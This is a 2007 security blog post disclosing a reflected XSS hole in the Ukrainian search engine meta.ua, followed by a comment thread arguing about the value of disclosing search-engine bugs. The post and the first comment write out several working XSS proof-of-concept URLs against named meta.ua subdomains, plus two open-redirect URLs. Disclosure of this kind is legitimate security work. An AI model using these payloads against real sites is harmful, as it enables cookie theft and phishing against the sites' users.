MOSEB-01 Bonus: XSS at meta.ua

22:31 01.06.2007

New bonus vulnerability at meta.ua. This Cross-Site Scripting hole I found today, 01.06.2007.

The hole at main domain of search engine http://meta.ua, like MOSEB-01: Vulnerability at meta.ua, but in another script.

XSS:

The vulnerability is in t parameter:
http://meta.ua/ua/topics.asp?t=%27%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E

Moral: surfing list of sites in search engine can be dangerous.

P.S.

Meta guys need to fix todays MOSEB holes, as they did last time with vulnerabilities at horo.meta.ua (I post about them 3 days ago). Search engine Meta.ua are frequent guest in my news.


5 відповідей на “MOSEB-01 Bonus: XSS at meta.ua”

  1. Trancer каже:

    What’s the point in disclosing XSS vuln’s in search engines?
    within less then five minute u can find about 10-20 xss and other vulnerabilities…
    xss:
    http://meta.ua/?news=%22%3E%3Cscript%3Ealert(’xss’)%3C/script%3E
    http://inter-biz.meta.ua/?q=%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E
    http://inter-biz.meta.ua/?q=foo&c=%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E
    http://map.meta.ua/?map=%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E
    http://bg.meta.ua/catalog.php?q=foo&t=0&rgn=0&c=1%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E
    redir:
    http://meta.ua/c.asp?href=http://google.com
    http://meta.ua/nav.asp?http://google.com

    got the point? the “Month of Search Engine Bugs” is nothing but lame and a waste of time for now…

  2. MustLive каже:

    Trancer

    About disclosing vulnerabilities in search engines (and XSS in particular) I wrote at announcement of Month of Search Engines Bugs and project description. So read them before ask dumb questions. I spent my time to write them to describe the project, so Trancer, please, read the announcement and project description.

    About the Meta engine. It is not an example, to tell me that it is too much easy to find XSS holes in search engines. Try to find within 5 minutes 10-20 XSS holes at Google, Yahoo and MSN (the top engines) and we will see - we’ll see that you not say such things, because the top engines much more secure and it is much harder to find holes in them. So no need to hurry with examples, because there are different engines (and many of them are in my list for MOSEB project).

    About Meta’s security. I can call this engine (with all their services) “Resident XSS” :-) , since I found a lot of holes in it (different holes, but XSS particulary) at this and last year. If you carefully look at my site (it is maybe not easy for you, because information not in English, but you can try) you will find that Meta.ua are frequent guest in my news. I wrote about vulnerabilities at meta.ua, help.meta.ua, context.meta.ua, lib.meta.ua, foto.meta.ua, forum.meta.ua, zakon.meta.ua, rabota.meta.ua, edu.meta.ua, cards.meta.ua, co.meta.ua, foto.meta.ua, forum.meta.ua, metamarket.com.ua, chumaki.meta.ua та horo.meta.ua. And I will write about many other holes at Meta’s projects.

    So no need to tell me about holes at this engine, because I know about security of Meta much more than other people (even more than Meta’s developers). And I trying to improve its security by informing developers about holes at Meta engine and its projects.

  3. MustLive каже:

    Trancer, about holes which you found.

    One of them was already found by me a long time ago. That hole at bg.meta.ua I found at 22.02.2007 (and there are others holes at that site). So it is not interesting (and lame) to tell me about vulns which I found long ago. But other vulns are interesting (didn’t find them yet, it was matter of time). So thanks for those holes, I’ll inform Meta’s developers about them. And “q=foo” is not necessarily for inter-biz.meta.ua and bg.meta.ua (holes will work without it).

    About redirectors holes. Don’t need to hurry up. I’ll write about this type of holes (in many search engines) at the end of month. Like I said in project description I prepared surpise for last day of month. So, man, just wait till the end of month. There are may redirectors at Meta (as I wrote at my site before) and I’ll write about them in necessary time (at the end of June). The nav.asp will be there and many others (thanks for c.asp, I put it to my list of redirectors at Meta). So wait a little with redirectors, there will be day for them.

    And about your last statement (about lame and wasting of time). You don’t right before me and before yourself. Try to ask yourself, why are you wasting your time here, if you think that it is not so interesting. There are two variants: or you like to wasting your time or you belive in your heart that it is interesting (and not wasting of time). And from my side, Trancer, I’ll do my best to keep your hope alive. So look at vulnerabilities in the project and you’ll find something for yourself. Everyone will find vulns for itself.

  4. Trancer каже:

    FIY, I did read the announcement and project description. I did went back with your posts and realize that Meta is on of your favorites.
    Don’t tell me I ask dumb questions if your not going to answer them. You did not answer this question in the project description or your feedback.
    WHY SEARCH ENGINES D00D??? What’s the difference between e-commerce\e-banking\social networks\web mails\blog systems or sites and content management systems in general? Most of them have much more risk potential against innocent users.

  5. MustLive каже:

    Trancer

    It is good that you read them, because I was trying to answer possible questions in the announcement and project description. And Meta is not my favorite :-) . It is only search engine from Ukraine that worth mentioning, so it is only one Ukrainian engine in the list of participants and I am worry about their security (I am worry about security of any site in Web), so I put Meta at first place of the list. But my favorite is another engine (you can guess who, it is easy - just ask yourself who is the top SE in the world and you’ll find out my favorite engine).

    Don’t tell me I ask dumb questions if your not going to answer them. You did not answer this question in the project description or your feedback.

    Dude, don’t be angry (as I see from your words). I always answer at all questions. When I said dumb, I mean that this question is really unnecessary. I do because I do (MOSEB). And I was trying to answer at this question at announcement and description (yes, I know that it was not fully described, but I was trying, and there is some information about my motives).

    The short answer is I do because I do, because I believe in it, because I see the point. And it is my way. This is in short. I understand that you want to know my motives in detail and I can tell you that you not first (to other people I told that I’ll write more detailed in description). And I wrote some information about motives there (like I wrote in preamble and in Main purpose of the project). To aware everyone about the problem. And the main task - which will be the results of the project - is improvement of security of search engines and Internet as a whole.

    I can tell more and could write more in description (and I planned so), but you must understand, that it takes a lot of time. Because writing in English takes much more time from me (than writing in Ukrainian and Russian), so I didn’t write about everything (I couldn’t - due a lack of time). I really spent a lot of time on that. There are many things that I can write, but I need to optimize my use of time (so there is only small info about my motives). So you need to take that that I wrote in description: to demonstrate the real state of security in search engines and to bring truth to people about real risks that engines bring to them. Or in short: I do what I do (and I believe in it).

    WHY SEARCH ENGINES D00D???

    Man, as I wrote in announcement and description, because SE are the most popular sites in the world. For this reason I decided (a long time ago) to make Month of Bugs in search engines.

    Why I think that SE are more popular than other sites? It is from my experience, from different news and other sources. For example, look at Alexa - from TOP5 sites (yahoo.com, msn.com, google.com, youtube.com and live.com) 4 are search engines. It is reality now - SE are the most popular sites in the world. So this kind of sites have largest risk potential.

    Other types of sites also have holes (most sites have vulns), so there is danger at other sites too. In this case I took SE as an example (because they are most popular sites). And in my work of social security audit, I everyday found vulns on different site and tell their owners to attend to security. So everyone need to take care about security of their sites and this project will remind them about this.

Leave a Reply

You must be logged in to post a comment.